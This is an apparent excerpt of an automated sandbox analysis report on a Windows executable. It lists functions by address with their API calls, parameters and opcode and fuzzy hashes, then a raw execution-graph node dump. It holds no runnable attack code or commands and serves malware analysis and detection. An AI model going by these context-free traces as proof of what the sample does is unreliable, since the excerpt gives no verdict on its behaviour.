                                                                                      • Opcode ID: 60a9e4a616bde9d3650d5374f7b0e792bef98a6345d6610fa7bc99ac1ec5f133
                                                                                      • Instruction ID: 4848c3cc747176469ce0ef08a48ea257d9f62360c4c8e5a9f2e1a14c28c6fa3b
                                                                                      • Opcode Fuzzy Hash: 60a9e4a616bde9d3650d5374f7b0e792bef98a6345d6610fa7bc99ac1ec5f133
                                                                                      • Instruction Fuzzy Hash: C3217370E04209ABDB10EBB5CD51B9F77A8EB44304F60857BA500F72C1DB7CAA05879E
                                                                                      Function 00403A97 Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                      • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                      • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                      • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                      • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                      • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                      • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                      • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                      • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                      • String ID:
                                                                                      • API String ID: 1694776339-0
                                                                                      • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                      • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                      • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                      • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                      Function 004019DC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                      • LocalFree.KERNEL32(006FFCA8,00000000,00401AB4), ref: 00401A1B
                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,006FFCA8,00000000,00401AB4), ref: 00401A3A
                                                                                      • LocalFree.KERNEL32(006FED58,?,00000000,00008000,006FFCA8,00000000,00401AB4), ref: 00401A79
                                                                                      • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                      • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                      • String ID: Xo
                                                                                      • API String ID: 3782394904-37304168
                                                                                      • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                      • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                                      • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                      • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                                      Function 00405314 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetSystemDefaultLCID.KERNEL32(00000000,0040555C,?,?,?,?,00000000,00000000,00000000,?,0040653B,00000000,0040654E), ref: 0040532E
                                                                                        • Part of subcall function 0040515C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,00405227,?,00000000,00405306), ref: 0040517A
                                                                                        • Part of subcall function 004051A8: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004053AA,?,?,?,00000000,0040555C), ref: 004051BB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoLocale$DefaultSystem
                                                                                      • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                      • API String ID: 1044490935-665933166
                                                                                      • Opcode ID: 161572950381ad7cbc257d6fe5eb76d638651fb1e2415ab537dea70fc89fa197
                                                                                      • Instruction ID: f22f4b18e1885e1925b87b286fa486de3d96a381b4aec2b7527aff107c54c5fa
                                                                                      • Opcode Fuzzy Hash: 161572950381ad7cbc257d6fe5eb76d638651fb1e2415ab537dea70fc89fa197
                                                                                      • Instruction Fuzzy Hash: 8E514234B00648ABDB00EBA59C91B9F776ADB89304F50957BB514BB3C6CA3DCA058B5C
                                                                                      Function 00403D02 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                      • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExitMessageProcess
                                                                                      • String ID: Error$Runtime error at 00000000$9@
                                                                                      • API String ID: 1220098344-1503883590
                                                                                      • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                      • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                      • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                      • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                      Function 004036B8 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                      • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                      • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$AllocString
                                                                                      • String ID:
                                                                                      • API String ID: 262959230-0
                                                                                      • Opcode ID: e5c78b39f57021be2b84baee447ab27339ef0409ceaef8bd5dd3a85dcd2f6a98
                                                                                      • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                      • Opcode Fuzzy Hash: e5c78b39f57021be2b84baee447ab27339ef0409ceaef8bd5dd3a85dcd2f6a98
                                                                                      • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                      Function 004030DC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(00000000,00409B3A), ref: 004030E3
                                                                                      • GetCommandLineA.KERNEL32(00000000,00409B3A), ref: 004030EE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CommandHandleLineModule
                                                                                      • String ID: U1hd.@$`&n
                                                                                      • API String ID: 2123368496-4055354193
                                                                                      • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                      • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                      • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                      • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                      Function 00401918 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                      • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                      • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                      • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                      • String ID:
                                                                                      • API String ID: 730355536-0
                                                                                      • Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                                      • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                      • Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                                      • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                                      Function 004093FC Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 0040941B
                                                                                      • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 0040942B
                                                                                      • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 0040943E
                                                                                      • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 00409448
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3269117855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3269072508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269152130.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3269178399.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLastSleep
                                                                                      • String ID:
                                                                                      • API String ID: 1458359878-0
                                                                                      • Opcode ID: fb2155ff6e4859bec8591c3fde2b363a3ebb44483e144ae34e4cc697df15f474
                                                                                      • Instruction ID: 2c3041558bff2c9731999a3fdaa5bf7f611e1c5313eca5e15d372d414c244bd5
                                                                                      • Opcode Fuzzy Hash: fb2155ff6e4859bec8591c3fde2b363a3ebb44483e144ae34e4cc697df15f474
                                                                                      • Instruction Fuzzy Hash: 32F0B472A0811457CB34B5EF9981A6F638DEAD1368751813BF904F3383D578CD0392AD

                                                                                      Execution Graph

                                                                                      Execution Coverage:16.5%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:5.5%
                                                                                      Total number of Nodes:2000
                                                                                      Total number of Limit Nodes:50
                                                                                      execution_graph 53667 40ce60 53668 40ce72 53667->53668 53669 40ce6d 53667->53669 53671 406eb0 CloseHandle 53669->53671 53671->53668 48158 402584 48159 402598 48158->48159 48160 4025ab 48158->48160 48188 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 48159->48188 48161 4025c2 RtlEnterCriticalSection 48160->48161 48162 4025cc 48160->48162 48161->48162 48174 4023b4 13 API calls 48162->48174 48165 40259d 48165->48160 48167 4025a1 48165->48167 48166 4025d5 48168 4025d9 48166->48168 48175 402088 48166->48175 48170 402635 48168->48170 48171 40262b RtlLeaveCriticalSection 48168->48171 48171->48170 48172 4025e5 48172->48168 48189 402210 9 API calls 48172->48189 48174->48166 48176 40209c 48175->48176 48177 4020af 48175->48177 48196 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 48176->48196 48179 4020c6 RtlEnterCriticalSection 48177->48179 48182 4020d0 48177->48182 48179->48182 48180 4020a1 48180->48177 48181 4020a5 48180->48181 48185 402106 48181->48185 48182->48185 48190 401f94 48182->48190 48185->48172 48186 4021f1 RtlLeaveCriticalSection 48187 4021fb 48186->48187 48187->48172 48188->48165 48189->48168 48191 401fa4 48190->48191 48192 401ff4 48191->48192 48193 401fd0 48191->48193 48197 401f0c 48191->48197 48192->48186 48192->48187 48193->48192 48202 401db4 48193->48202 48196->48180 48206 40178c 48197->48206 48200 401f29 48200->48191 48203 401e02 48202->48203 48204 401dd2 48202->48204 48203->48204 48229 401d1c 48203->48229 48204->48192 48210 4017a8 48206->48210 48207 4017b2 48225 401678 VirtualAlloc 48207->48225 48210->48207 48211 40180f 48210->48211 48213 401803 48210->48213 48217 4014e4 48210->48217 48226 4013e0 LocalAlloc 48210->48226 48211->48200 48216 401e80 9 API calls 48211->48216 48227 4015c0 VirtualFree 48213->48227 48214 4017be 48214->48211 48216->48200 48218 4014f3 VirtualAlloc 48217->48218 48220 401520 48218->48220 48221 401543 48218->48221 48228 401398 LocalAlloc 48220->48228 48221->48210 48223 40152c 48223->48221 48224 401530 VirtualFree 48223->48224 48224->48221 48225->48214 48226->48210 48227->48211 48228->48223 48230 401d2e 48229->48230 48231 401d51 48230->48231 48232 401d63 48230->48232 48242 401940 48231->48242 48234 401940 3 API calls 48232->48234 48235 401d61 48234->48235 48236 401d79 48235->48236 48252 401bf8 9 API calls 48235->48252 48236->48204 48238 401d88 48239 401da2 48238->48239 48253 401c4c 9 API calls 48238->48253 48254 401454 LocalAlloc 48239->48254 48243 401966 48242->48243 48251 4019bf 48242->48251 48255 40170c 48243->48255 48247 40199a 48247->48251 48261 401454 LocalAlloc 48247->48261 48248 401983 48248->48247 48260 4015c0 VirtualFree 48248->48260 48251->48235 48252->48238 48253->48239 48254->48236 48257 401743 48255->48257 48256 401783 48259 4013e0 LocalAlloc 48256->48259 48257->48256 48258 40175d VirtualFree 48257->48258 48258->48257 48259->48248 48260->48247 48261->48251 48262 41edc4 48263 41edd3 IsWindowVisible 48262->48263 48264 41ee09 48262->48264 48263->48264 48265 41eddd IsWindowEnabled 48263->48265 48265->48264 48266 41ede7 48265->48266 48269 402648 48266->48269 48268 41edf1 EnableWindow 48268->48264 48270 40264c 48269->48270 48271 402656 48269->48271 48270->48271 48273 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 48270->48273 48271->48268 48271->48271 48273->48271 53672 48cea0 53673 48ced4 53672->53673 53674 48ceea 53673->53674 53675 48ced6 53673->53675 53678 48cef9 53674->53678 53679 48cf26 53674->53679 53808 4469d0 18 API calls 53675->53808 53677 48cedf Sleep 53781 48cf21 53677->53781 53680 446a2c 18 API calls 53678->53680 53684 48cf62 53679->53684 53685 48cf35 53679->53685 53682 48cf08 53680->53682 53681 403420 4 API calls 53683 48d394 53681->53683 53686 48cf10 FindWindowA 53682->53686 53690 48cfb8 53684->53690 53691 48cf71 53684->53691 53687 446a2c 18 API calls 53685->53687 53688 446cac 5 API calls 53686->53688 53689 48cf42 53687->53689 53688->53781 53693 48cf4a FindWindowA 53689->53693 53696 48d014 53690->53696 53697 48cfc7 53690->53697 53809 4469d0 18 API calls 53691->53809 53695 446cac 5 API calls 53693->53695 53694 48cf7d 53810 4469d0 18 API calls 53694->53810 53792 48cf5d 53695->53792 53705 48d070 53696->53705 53706 48d023 53696->53706 53813 4469d0 18 API calls 53697->53813 53700 48cf8a 53811 4469d0 18 API calls 53700->53811 53701 48cfd3 53814 4469d0 18 API calls 53701->53814 53704 48cf97 53812 4469d0 18 API calls 53704->53812 53716 48d0aa 53705->53716 53717 48d07f 53705->53717 53818 4469d0 18 API calls 53706->53818 53708 48cfe0 53815 4469d0 18 API calls 53708->53815 53710 48d02f 53819 4469d0 18 API calls 53710->53819 53712 48cfa2 SendMessageA 53715 446cac 5 API calls 53712->53715 53714 48cfed 53816 4469d0 18 API calls 53714->53816 53715->53792 53725 48d0f8 53716->53725 53726 48d0b9 53716->53726 53720 446a2c 18 API calls 53717->53720 53718 48d03c 53820 4469d0 18 API calls 53718->53820 53723 48d08c 53720->53723 53722 48cff8 PostMessageA 53817 446b04 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53722->53817 53728 48d094 RegisterClipboardFormatA 53723->53728 53724 48d049 53821 4469d0 18 API calls 53724->53821 53734 48d14c 53725->53734 53735 48d107 53725->53735 53823 4469d0 18 API calls 53726->53823 53731 446cac 5 API calls 53728->53731 53731->53781 53732 48d054 SendNotifyMessageA 53822 446b04 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53732->53822 53733 48d0c5 53824 4469d0 18 API calls 53733->53824 53744 48d15b 53734->53744 53745 48d1a0 53734->53745 53826 4469d0 18 API calls 53735->53826 53739 48d0d2 53825 4469d0 18 API calls 53739->53825 53740 48d113 53827 4469d0 18 API calls 53740->53827 53743 48d0dd SendMessageA 53748 446cac 5 API calls 53743->53748 53830 4469d0 18 API calls 53744->53830 53753 48d1af 53745->53753 53754 48d202 53745->53754 53747 48d120 53828 4469d0 18 API calls 53747->53828 53748->53792 53749 48d167 53831 4469d0 18 API calls 53749->53831 53752 48d12b PostMessageA 53829 446b04 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53752->53829 53757 446a2c 18 API calls 53753->53757 53761 48d289 53754->53761 53762 48d211 53754->53762 53755 48d174 53832 4469d0 18 API calls 53755->53832 53759 48d1bc 53757->53759 53763 42e1f0 2 API calls 53759->53763 53760 48d17f SendNotifyMessageA 53833 446b04 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53760->53833 53771 48d298 53761->53771 53778 48d2be 53761->53778 53765 446a2c 18 API calls 53762->53765 53766 48d1c9 53763->53766 53769 48d220 53765->53769 53767 48d1df GetLastError 53766->53767 53768 48d1cf 53766->53768 53772 446cac 5 API calls 53767->53772 53770 446cac 5 API calls 53768->53770 53834 4469d0 18 API calls 53769->53834 53773 48d1dd 53770->53773 53839 4469d0 18 API calls 53771->53839 53772->53773 53777 446cac 5 API calls 53773->53777 53776 48d2a2 FreeLibrary 53840 446b04 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53776->53840 53777->53781 53782 48d2cd 53778->53782 53783 48d2f0 53778->53783 53779 48d233 GetProcAddress 53784 48d279 53779->53784 53785 48d23f 53779->53785 53781->53681 53786 446a2c 18 API calls 53782->53786 53790 48d2ff 53783->53790 53797 48d333 53783->53797 53838 446b04 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53784->53838 53835 4469d0 18 API calls 53785->53835 53788 48d2d9 53786->53788 53795 48d2e1 CreateMutexA 53788->53795 53841 487218 18 API calls 53790->53841 53791 48d24b 53836 4469d0 18 API calls 53791->53836 53792->53781 53795->53781 53796 48d258 53800 446cac 5 API calls 53796->53800 53797->53781 53843 487218 18 API calls 53797->53843 53799 48d30b 53801 48d31c OemToCharBuffA 53799->53801 53802 48d269 53800->53802 53842 487230 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53801->53842 53837 446b04 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53802->53837 53805 48d34e 53806 48d35f CharToOemBuffA 53805->53806 53844 487230 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53806->53844 53808->53677 53809->53694 53810->53700 53811->53704 53812->53712 53813->53701 53814->53708 53815->53714 53816->53722 53817->53792 53818->53710 53819->53718 53820->53724 53821->53732 53822->53781 53823->53733 53824->53739 53825->53743 53826->53740 53827->53747 53828->53752 53829->53792 53830->53749 53831->53755 53832->53760 53833->53781 53834->53779 53835->53791 53836->53796 53837->53792 53838->53792 53839->53776 53840->53781 53841->53799 53842->53781 53843->53805 53844->53781 48274 47b5ce 48275 47b5d7 48274->48275 48278 47b602 48274->48278 48277 47b5f4 48275->48277 48275->48278 48276 47b641 48279 47b654 48276->48279 48280 47b661 48276->48280 48681 472460 162 API calls 48277->48681 48278->48276 48683 479fc0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 48278->48683 48284 47b696 48279->48284 48285 47b658 48279->48285 48287 47b67b 48280->48287 48288 47b66a 48280->48288 48283 47b634 48684 47a18c 37 API calls 48283->48684 48289 47b69f 48284->48289 48290 47b6ba 48284->48290 48292 47b65c 48285->48292 48297 47b6f4 48285->48297 48298 47b6d9 48285->48298 48286 47b5f9 48286->48278 48682 408b48 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 48286->48682 48686 47a1fc 37 API calls 48287->48686 48685 47a18c 37 API calls 48288->48685 48687 47a1fc 37 API calls 48289->48687 48688 47a1fc 37 API calls 48290->48688 48302 47b71d 48292->48302 48303 47b73b 48292->48303 48690 47a1fc 37 API calls 48297->48690 48689 47a1fc 37 API calls 48298->48689 48304 47b732 48302->48304 48691 47a18c 37 API calls 48302->48691 48693 479e58 24 API calls 48303->48693 48692 479e58 24 API calls 48304->48692 48308 47b739 48309 47b751 48308->48309 48310 47b74b 48308->48310 48311 47b74f 48309->48311 48313 47a168 37 API calls 48309->48313 48310->48311 48394 47a168 48310->48394 48399 477744 48311->48399 48313->48311 48762 479aec 37 API calls 48394->48762 48396 47a183 48763 408b48 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 48396->48763 48764 42d774 GetWindowsDirectoryA 48399->48764 48401 477762 48402 403450 4 API calls 48401->48402 48403 47776f 48402->48403 48766 42d7a0 GetSystemDirectoryA 48403->48766 48405 477777 48406 403450 4 API calls 48405->48406 48407 477784 48406->48407 48768 42d7cc 48407->48768 48409 47778c 48410 403450 4 API calls 48409->48410 48411 477799 48410->48411 48412 4777a2 48411->48412 48413 4777be 48411->48413 48824 42d0e4 48412->48824 48415 403400 4 API calls 48413->48415 48420 4777bc 48415->48420 48417 403450 4 API calls 48417->48420 48418 477803 48772 4775cc 48418->48772 48420->48418 48832 42c7a8 48420->48832 48424 403450 4 API calls 48426 47781f 48424->48426 48425 403450 4 API calls 48427 4777eb 48425->48427 48428 47783d 48426->48428 48430 4035c0 4 API calls 48426->48430 48427->48418 48429 403450 4 API calls 48427->48429 48431 4775cc 8 API calls 48428->48431 48429->48418 48430->48428 48432 47784c 48431->48432 48433 403450 4 API calls 48432->48433 48434 477859 48433->48434 48435 477881 48434->48435 48437 42c36c 5 API calls 48434->48437 48436 4778e8 48435->48436 48440 4775cc 8 API calls 48435->48440 48438 477912 48436->48438 48439 4778f1 48436->48439 48441 47786f 48437->48441 48783 42c36c 48438->48783 48443 42c36c 5 API calls 48439->48443 48444 477899 48440->48444 48442 4035c0 4 API calls 48441->48442 48442->48435 48446 4778fe 48443->48446 48447 403450 4 API calls 48444->48447 48449 4035c0 4 API calls 48446->48449 48450 4778a6 48447->48450 48448 47791f 48793 4035c0 48448->48793 48452 477910 48449->48452 48453 4778b9 48450->48453 48840 451f4c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 48450->48840 48815 4776b0 48452->48815 48455 4775cc 8 API calls 48453->48455 48457 4778c8 48455->48457 48459 403450 4 API calls 48457->48459 48461 4778d5 48459->48461 48460 403400 4 API calls 48462 47794b 48460->48462 48461->48436 48841 451f4c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 48461->48841 48464 477ba0 48462->48464 48465 477ba8 48464->48465 48465->48465 48919 45262c 48465->48919 48468 403450 4 API calls 48469 477bd5 48468->48469 48470 403494 4 API calls 48469->48470 48471 477be2 48470->48471 48937 40357c 48471->48937 48473 477bf0 48474 455f80 24 API calls 48473->48474 48475 477bf8 48474->48475 48476 477c0b 48475->48476 48967 455774 6 API calls 48475->48967 48478 42c36c 5 API calls 48476->48478 48479 477c18 48478->48479 48480 4035c0 4 API calls 48479->48480 48481 477c28 48480->48481 48482 477c32 CreateDirectoryA 48481->48482 48483 477c3c GetLastError 48482->48483 48504 477c98 48482->48504 48485 450b64 4 API calls 48483->48485 48484 4035c0 4 API calls 48486 477cad 48484->48486 48487 477c54 48485->48487 48951 477b48 48486->48951 48968 406cd0 19 API calls 48487->48968 48491 477c64 48969 42e670 FormatMessageA 48491->48969 48504->48484 48681->48286 48683->48283 48684->48276 48685->48292 48686->48292 48687->48292 48688->48292 48689->48292 48690->48292 